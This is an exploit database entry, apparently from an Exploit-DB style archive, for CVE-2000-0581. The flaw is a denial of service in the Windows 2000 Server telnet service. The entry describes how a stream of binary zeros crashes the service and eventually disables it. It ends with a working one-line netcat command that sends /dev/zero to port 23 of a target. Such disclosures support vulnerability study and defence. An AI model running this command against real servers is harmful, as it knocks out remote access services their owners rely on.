Microsoft Windows Server 2000 - Telnet Server Denial of Service

Author: SecureXpert Labs
type: dos
platform: windows
port: 
date_added: 2000-06-30 
date_updated: 2012-07-23 
verified: 1 
codes: CVE-2000-0581;OSVDB-1437 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/1414/info

Microsoft Windows 2000 Server comes with a telnet server to provide remote console access. A remote attacker can send a stream of binary zeros to the server, causing it to fail. If automatic restart is enabled, numerous attacks will cause the telnet server to restart until the maximum failure/restart count is exceeded, at which point the service is disabled.

An attacker can exploit this issue using netcat under Linux:

nc target.host 23 < /dev/zero